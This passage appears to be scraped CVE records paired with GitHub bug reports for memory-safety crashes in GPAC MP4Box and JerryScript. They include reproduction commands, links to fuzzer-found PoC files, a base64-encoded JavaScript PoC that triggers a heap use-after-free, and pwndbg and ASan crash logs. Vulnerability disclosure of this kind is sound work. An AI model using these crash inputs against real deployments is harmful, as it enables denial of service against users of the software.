<gf_node_changed+218> test rbx, rbx 0x7ffff784a1cd <gf_node_changed+221> je gf_node_changed+233 <gf_node_changed+233> 0x7ffff784a1cf <gf_node_changed+223> mov eax, dword ptr [rbx] 0x7ffff784a1d1 <gf_node_changed+225> sub eax, 0x63 0x7ffff784a1d4 <gf_node_changed+228> and eax, 0xfffffffd ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6a90 ◂— 0x0 ... ↓ 3 skipped 04:0020│ 0x7fffffff6ab0 ◂— 0x7374636f /* 'octs' */ 05:0028│ 0x7fffffff6ab8 —▸ 0x5555555e4fd0 ◂— 0x7374636f /* 'octs' */ 06:0030│ 0x7fffffff6ac0 ◂— 0x2 07:0038│ 0x7fffffff6ac8 ◂— 0x8000000000000006 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff784a1c8 gf_node_changed+216 f 1 0x7ffff784b675 gf_sg_reset+805 f 2 0x7ffff784ba47 gf_sg_del+55 f 3 0x7ffff788b7f8 gf_sg_proto_del+424 f 4 0x7ffff7905f88 gf_bifs_dec_proto_list+680 f 5 0x7ffff7913a11 BM_ParseInsert+769 f 6 0x7ffff7914fe1 BM_ParseCommand+113 f 7 0x7ffff7915353 gf_bifs_decode_command_list+163 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> Program received signal SIGSEGV, Segmentation fault. 0x0000000000000001 in ?? () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x1 RBX 0x7fffffff6bc0 ◂— 0x0 RCX 0x7fffffff6bc0 ◂— 0x0 RDX 0x5555555e6230 —▸ 0x5555555e6270 ◂— 0x0 RDI 0x0 RSI 0x1 R8 0x0 R9 0x0 R10 0x7ffff775ba62 ◂— 'gf_node_changed' R11 0x7ffff784a0f0 (gf_node_changed) ◂— endbr64 R12 0x5555555c6010 ◂— 0x200000002 R13 0x5555555e5100 ◂— 0x0 R14 0x5555555e6230 —▸ 0x5555555e6270 ◂— 0x0 R15 0x7fffffff6bc0 ◂— 0x0 RBP 0x5555555e6230 —▸ 0x5555555e6270 ◂— 0x0 *RSP 0x7fffffff6a88 —▸ 0x7ffff784a1ca (gf_node_changed+218) ◂— test rbx, rbx *RIP 0x1 ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── Invalid address 0x1 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6a88 —▸ 0x7ffff784a1ca (gf_node_changed+218) ◂— test rbx, rbx 01:0008│ 0x7fffffff6a90 ◂— 0x0 ... ↓ 3 skipped 05:0028│ 0x7fffffff6ab0 ◂— 0x7374636f /* 'octs' */ 06:0030│ 0x7fffffff6ab8 —▸ 0x5555555e4fd0 ◂— 0x7374636f /* 'octs' */ 07:0038│ 0x7fffffff6ac0 ◂— 0x2 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x1 f 1 0x7ffff784a1ca gf_node_changed+218 f 2 0x7ffff784b675 gf_sg_reset+805 f 3 0x7ffff784ba47 gf_sg_del+55 f 4 0x7ffff788b7f8 gf_sg_proto_del+424 f 5 0x7ffff7905f88 gf_bifs_dec_proto_list+680 f 6 0x7ffff7913a11 BM_ParseInsert+769 f 7 0x7ffff7914fe1 BM_ParseCommand+113 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> ```

Invalid call in gf_node_changed()

https://api.github.com/repos/gpac/gpac/issues/1974/comments

2021-12-11T01:02:59Z

2021-12-13T13:22:08Z

https://github.com/gpac/gpac/issues/1974

CVE-2021-45764

2022-01-14T20:15:14.977

GPAC v1.1.0 was discovered to contain an invalid memory address dereference via the function shift_chunk_offsets.isra().

https://github.com/gpac/gpac/issues/1971

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid memory address dereference was discovered in shift_chunk_offsets.isra(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -hint poc_9 ``` [poc_9.zip](https://github.com/gpac/gpac/files/7693929/poc_9.zip) **Result** ``` [iso file] Unknown box type stbU in parent minf [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [iso file] Box "trak" is larger than container box [iso file] Box "moov" size 256 (start 20) invalid (read 2209) [iso file] Unknown top-level box type 079Fmd Saving ./poc/poc_9: In-place rewrite [1] 2265002 segmentation fault ./MP4Box -hint ./poc/poc_9 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7981ba3 in shift_chunk_offsets.isra () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX 0x5555555cc6e0 ◂— 0x6d696e66 /* 'fnim' */ RBX 0x5555555ccfe0 ◂— 0x7374626c /* 'lbts' */ RCX 0x0 RDX 0x5555555cf160 ◂— 0x6d646961 /* 'aidm' */ RDI 0x28 RSI 0x34 R8 0x14 R9 0x0 R10 0x7ffff775d6fa ◂— 'gf_isom_box_size' R11 0x7ffff796bce0 (gf_isom_box_size) ◂— endbr64 R12 0x5555555c72a0 ◂— 0xffffffec R13 0x14 R14 0x1 R15 0x7fffffff7e80 ◂— 0x0 RBP 0x0 RSP 0x7fffffff7e00 ◂— 0xf7747c68 RIP 0x7ffff7981ba3 (shift_chunk_offsets.isra+19) ◂— mov esi, dword ptr [rsi] ─────────────────────────────────[ DISASM ]───────────────────────────────── ► 0x7ffff7981ba3 <shift_chunk_offsets.isra+19> mov esi, dword ptr [rsi] 0x7ffff7981ba5 <shift_chunk_offsets.isra+21> mov qword ptr [rsp + 8], rdi 0x7ffff7981baa <shift_chunk_offsets.isra+26> mov qword ptr [rsp + 0x10], rdx 0x7ffff7981baf <shift_chunk_offsets.isra+31> mov dword ptr [rsp + 0x2c], r9d 0x7ffff7981bb4 <shift_chunk_offsets.isra+36> test esi, esi 0x7ffff7981bb6 <shift_chunk_offsets.isra+38> je shift_chunk_offsets.isra+175 <shift_chunk_offsets.isra+175> ↓ 0x7ffff7981c3f <shift_chunk_offsets.isra+175> add rsp, 0x38 0x7ffff7981c43 <shift_chunk_offsets.isra+179> xor eax, eax 0x7ffff7981c45 <shift_chunk_offsets.isra+181> pop rbx 0x7ffff7981c46 <shift_chunk_offsets.isra+182> pop rbp 0x7ffff7981c47 <shift_chunk_offsets.isra+183> pop r12 ─────────────────────────────────[ STACK ]──────────────────────────────────00:0000│ rsp 0x7fffffff7e00 ◂— 0xf7747c68 01:0008│ 0x7fffffff7e08 ◂— 0x0 02:0010│ 0x7fffffff7e10 ◂— 0x999 03:0018│ 0x7fffffff7e18 ◂— 0x34 /* '4' */ 04:0020│ 0x7fffffff7e20 —▸ 0x7ffff7fc7368 —▸ 0x7ffff7ffe450 —▸ 0x7ffff73131e0 —▸ 0x7ffff7ffe190 ◂— ... 05:0028│ 0x7fffffff7e28 —▸ 0x7fffffff7f68 —▸ 0x7ffff7751b48 ◂— 0xe0012000053a2 06:0030│ 0x7fffffff7e30 —▸ 0x7ffff775d6fa ◂— 'gf_isom_box_size' 07:0038│ 0x7fffffff7e38 —▸ 0x5555555ccfe0 ◂— 0x7374626c /* 'lbts' */ ───────────────────────────────[ BACKTRACE ]──────────────────────────────── ► f 0 0x7ffff7981ba3 shift_chunk_offsets.isra+19 f 1 0x7ffff7981fd0 inplace_shift_moov_meta_offsets+224 f 2 0x7ffff7982a5c inplace_shift_mdat+732 f 3 0x7ffff7986c29 WriteToFile+2713 f 4 0x7ffff7978042 gf_isom_write+370 f 5 0x7ffff79780c8 gf_isom_close+24 f 6 0x55555557ad12 mp4boxMain+7410 f 7 0x7ffff75630b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────pwndbg> bt #0 0x00007ffff7981ba3 in shift_chunk_offsets.isra () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7981fd0 in inplace_shift_moov_meta_offsets () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7982a5c in inplace_shift_mdat () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7986c29 in WriteToFile () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x00007ffff7978042 in gf_isom_write () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #5 0x00007ffff79780c8 in gf_isom_close () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0x000055555557ad12 in mp4boxMain () #7 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308 #8 0x000055555556c45e in _start () ```

Invalid memory address dereference in shift_chunk_offsets.isra()

https://api.github.com/repos/gpac/gpac/issues/1971/comments

2021-12-10T15:59:06Z

2021-12-13T13:22:07Z

https://github.com/gpac/gpac/issues/1971

CVE-2021-45767

2022-01-14T20:15:15.020

GPAC 1.1.0 was discovered to contain an invalid memory address dereference via the function lsr_read_id(). This vulnerability can lead to a Denial of Service (DoS).

https://github.com/gpac/gpac/issues/1982

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid memory address dereference was discovered in lsr_read_id(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-rev1555-g339e7a736-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/root/fuck_bin/gpac/test Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -bt poc ``` **POCs** [lsr_read_id.zip](https://github.com/gpac/gpac/files/7708191/lsr_read_id.zip) ``` tree . ├── lsr_read_id-lsr_read_a │   └── id_000661,sig_11,src_005751,op_havoc,rep_4 ├── lsr_read_id-lsr_read_animate │   ├── id_000623,sig_11,src_005500+003857,op_splice,rep_2 │   ├── id_000669,sig_11,src_005818,op_havoc,rep_8 │   └── id_000707,sig_11,src_006355,op_havoc,rep_8 ├── lsr_read_id-lsr_read_audio.isra │   └── id_000539,sig_11,src_004864,op_havoc,rep_8 ├── lsr_read_id-lsr_read_ellipse │   ├── id_000540,sig_11,src_004864,op_havoc,rep_8 │   └── id_000681,sig_06,src_005943,op_havoc,rep_2 ├── lsr_read_id-lsr_read_linearGradient │   └── id_000407,sig_11,src_004547,op_havoc,rep_2 ├── lsr_read_id-lsr_read_polygon │   ├── id_000424,sig_11,src_004557,op_havoc,rep_4 │   └── id_000533,sig_06,src_004856+005154,op_splice,rep_4 ├── lsr_read_id-lsr_read_rect │   └── id_000653,sig_06,src_005718+005529,op_splice,rep_2 └── lsr_read_id-lsr_read_scene_content_model ├── id_000457,sig_11,src_004611,op_havoc,rep_2 └── id_000687,sig_11,src_006098,op_havoc,rep_4 8 directories, 13 files ``` **Result** The result is omitted here. **gdb** The gdb result is omitted here.

Invalid memory address dereference in lsr_read_id()

https://api.github.com/repos/gpac/gpac/issues/1982/comments

2021-12-14T02:23:22Z

2021-12-14T10:36:53Z

https://github.com/gpac/gpac/issues/1982

CVE-2021-46170

2022-01-14T21:15:08.540

An issue was discovered in JerryScript commit a6ab5e9. There is an Use-After-Free in lexer_compare_identifier_to_string in js-lexer.c file.

https://github.com/jerryscript-project/jerryscript/issues/4917

github.com

###### JerryScript revision a6ab5e9 ###### Build platform Ubuntu 20.04.3 LTS (Linux 5.11.0-43-generic x86_64) ###### Build steps ```sh ./tools/build.py --clean --compile-flag=-fsanitize=address --lto=off --error-message=on --profile=es2015-subset --stack-limit=15 --debug --logging=on --line-info=on ``` ###### Test case ``` base64 poc DQp2YXIgYT0gWyIiLCAiXDAiLCAiXHlmIl0NCkFycmF5LnByb3RvdHlwZVs0XSA9IDEwOw0KZnVu Y3Rpb24gRWVzdCgpDQp7DQogICAgYS5zb3J0KGZ1bmN0aW9uKCkgew0KICAgQSA9IGZ1bmN0aW9u KCkgeyB9Ow0KQS5wcm90b3R5cGUueCU9IDQyOw0KdmFyIG8gPSBuZXcgUHJveHkoew0KICAgICAg ICAiMyI6IHsNCiAgICAgICAgICAgIHdyaXRhYmxlOmZhbHNlLA0KICAgICAgICAgICAgdmFsdUM6 MjANCn0NCiAgICB9LCB7DQogICAgZ2V0UHJvdG90eXBlT2Y6IGZ1bmN0aW9uICh2YWwsIHNpemUs IGNoKSB7DSAgYS5zb3IKICAgIHZhciBlc3VsdCA9ICIiO3Jlc3VsdCA9IG5ldyBTdHJpUGcgICAg ICAgICAgICA7Ozs7Ozs7Ozs7OyAgICAgDQogICAgICAgaWYgKGNoID0+IG51bGwpIHsgIGNoID0g IiAiOw0KfQ0KfSwgew0KICAgIGdldAAAAEBvdHlwZU9oIDwgc2l6ZSAgdWx0Ow0KICAgIH0NCiAg ICByZXR1cm4gcmVzdWxkOw0KfQ0KfSk7DQogICAgICAgIG8ueCA9IDQzOw0KICAgICAgICB2YXIg cmVzdWx0ID0gIiI7DQogICAgICAgIGZvciAodmFyIHAgaW4hbykNCiAgICByZXN1bHQgK2EgfCAw Ow0KICAgIH0pOw0KICAgIFdTY3JpcHQuRWNobyhhKTsNCn0NCg0KVGVzdCgpOw0KDQ== ``` ###### Execution steps ```sh jerry ./poc ``` ##### asan log ``` ================================================================= ==2953261==ERROR: AddressSanitizer: heap-use-after-free on address 0xf4502508 at pc 0x56731155 bp 0xffa0fc88 sp 0xffa0fc78 READ of size 4 at 0xf4502508 thread T0 #0 0x56731154 in lexer_compare_identifier_to_string /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-lexer.c:3503 #1 0x56738c41 in parser_parse_object_literal /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:1593 #2 0x5673c3b8 in parser_parse_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2339 #3 0x5674559d in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4428 #4 0x5673e25f in parser_process_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2772 #5 0x56745605 in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4437 #6 0x5674e9a0 in parser_parse_var_statement /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-statm.c:527 #7 0x5675bb93 in parser_parse_statements /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-statm.c:2925 #8 0x566809a2 in parser_parse_function /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser.c:2792 #9 0x5672d0d9 in lexer_construct_function_object /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-lexer.c:2820 #10 0x567398f9 in parser_parse_function_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:1828 #11 0x5673c0df in parser_parse_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2313 #12 0x5674559d in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4428 #13 0x5673e25f in parser_process_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2772 #14 0x56745605 in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4437 #15 0x56745334 in parser_parse_expression_statement /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4399 #16 0x5675cf43 in parser_parse_statements /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-statm.c:3230 #17 0x566809a2 in parser_parse_function /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser.c:2792 #18 0x5674fcbb in parser_parse_function_statement /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-statm.c:799 #19 0x5675bc06 in parser_parse_statements /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-statm.c:2957 #20 0x5667d2ac in parser_parse_source /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser.c:2340 #21 0x5668356d in parser_parse_script /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser.c:3413 #22 0x565bd97d in jerry_parse_common /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/api/jerryscript.c:398 #23 0x565bdce1 in jerry_parse /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/api/jerryscript.c:466 #24 0x565b6734 in main /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-main/main-jerry.c:161 #25 0xf7618ee4 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1eee4) #26 0x565b5a94 in _start (/home/aidai/fuzzing/jerryscript/jerryscript-test/build/bin/jerry+0x1ea94) 0xf4502508 is located 8 bytes inside of 124-byte region [0xf4502500,0xf450257c) freed by thread T0 here: #0 0xf7a20814 in __interceptor_free (/lib32/libasan.so.5+0x113814) #1 0x56669e18 in jmem_heap_free_block_internal /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/jmem/jmem-heap.c:477 #2 0x56669f57 in jmem_heap_free_block /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/jmem/jmem-heap.c:691 #3 0x56748112 in parser_free /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-mem.c:59 #4 0x56748112 in parser_data_free /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-mem.c:134 #5 0x5674849b in parser_list_free /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-mem.c:211 #6 0x5667f81c in parser_restore_context /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser.c:2662 #7 0x566809d6 in parser_parse_function /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser.c:2807 #8 0x5672d0d9 in lexer_construct_function_object /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-lexer.c:2820 #9 0x567398f9 in parser_parse_function_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:1828 #10 0x5673c0df in parser_parse_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2313 #11 0x5674559d in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4428 #12 0x56739102 in parser_parse_object_literal /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:1656 #13 0x5673c3b8 in parser_parse_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2339 #14 0x5674559d in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4428 #15 0x5673e25f in parser_process_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2772 #16 0x56745605 in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4437 #17 0x5674e9a0 in parser_parse_var_statement /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-statm.c:527 #18 0x5675bb93 in parser_parse_statements /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-statm.c:2925 #19 0x566809a2 in parser_parse_function /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser.c:2792 #20 0x5672d0d9 in lexer_construct_function_object /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-lexer.c:2820 #21 0x567398f9 in parser_parse_function_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:1828 #22 0x5673c0df in parser_parse_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2313 #23 0x5674559d in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4428 #24 0x5673e25f in parser_process_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2772 #25 0x56745605 in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4437 #26 0x56745334 in parser_parse_expression_statement /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4399 #27 0x5675cf43 in parser_parse_statements /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-statm.c:3230 #28 0x566809a2 in parser_parse_function /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser.c:2792 #29 0x5674fcbb in parser_parse_function_statement /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-statm.c:799 #30 0x5675bc06 in parser_parse_statements /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-statm.c:2957 previously allocated by thread T0 here: #0 0xf7a20c17 in __interceptor_malloc (/lib32/libasan.so.5+0x113c17) #1 0x56669c14 in jmem_heap_alloc /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/jmem/jmem-heap.c:254 #2 0x56669c84 in jmem_heap_gc_and_alloc_block /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/jmem/jmem-heap.c:291 #3 0x56669d39 in jmem_heap_alloc_block_null_on_error /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/jmem/jmem-heap.c:342 #4 0x56747da2 in parser_malloc /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-mem.c:43 #5 0x56748645 in parser_list_append /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-mem.c:239 #6 0x5672b7fd in lexer_construct_literal_object /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-lexer.c:2556 #7 0x5673ba0b in parser_parse_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2242 #8 0x5674559d in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4428 #9 0x56745334 in parser_parse_expression_statement /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4399 #10 0x5675cf43 in parser_parse_statements /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-statm.c:3230 #11 0x566809a2 in parser_parse_function /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser.c:2792 #12 0x5672d0d9 in lexer_construct_function_object /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-lexer.c:2820 #13 0x567398f9 in parser_parse_function_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:1828 #14 0x5673c0df in parser_parse_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2313 #15 0x5674559d in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4428 #16 0x56739102 in parser_parse_object_literal /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:1656 #17 0x5673c3b8 in parser_parse_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2339 #18 0x5674559d in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4428 #19 0x5673e25f in parser_process_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2772 #20 0x56745605 in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4437 #21 0x5674e9a0 in parser_parse_var_statement /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-statm.c:527 #22 0x5675bb93 in parser_parse_statements /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-statm.c:2925 #23 0x566809a2 in parser_parse_function /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser.c:2792 #24 0x5672d0d9 in lexer_construct_function_object /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-lexer.c:2820 #25 0x567398f9 in parser_parse_function_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:1828 #26 0x5673c0df in parser_parse_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2313 #27 0x5674559d in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4428 #28 0x5673e25f in parser_process_unary_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:2772 #29 0x56745605 in parser_parse_expression /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-parser-expr.c:4437 SUMMARY: AddressSanitizer: heap-use-after-free /home/aidai/fuzzing/jerryscript/jerryscript-test/jerry-core/parser/js/js-lexer.c:3503 in lexer_compare_identifier_to_string Shadow bytes around the buggy address: 0x3e8a0450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e8a0460: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e8a0470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e8a0480: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e8a0490: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3e8a04a0: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x3e8a04b0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x3e8a04c0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x3e8a04d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x3e8a04e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x3e8a04f0: 00 00 00 00 00 00 00 04 fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2953261==ABORTING ```

Use After Free at jerry-core/parser/js/js-lexer.c:3503 in lexer_compare_identifier_to_string

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4917/comments

2022-01-03T03:39:39Z

2022-01-04T10:38:46Z

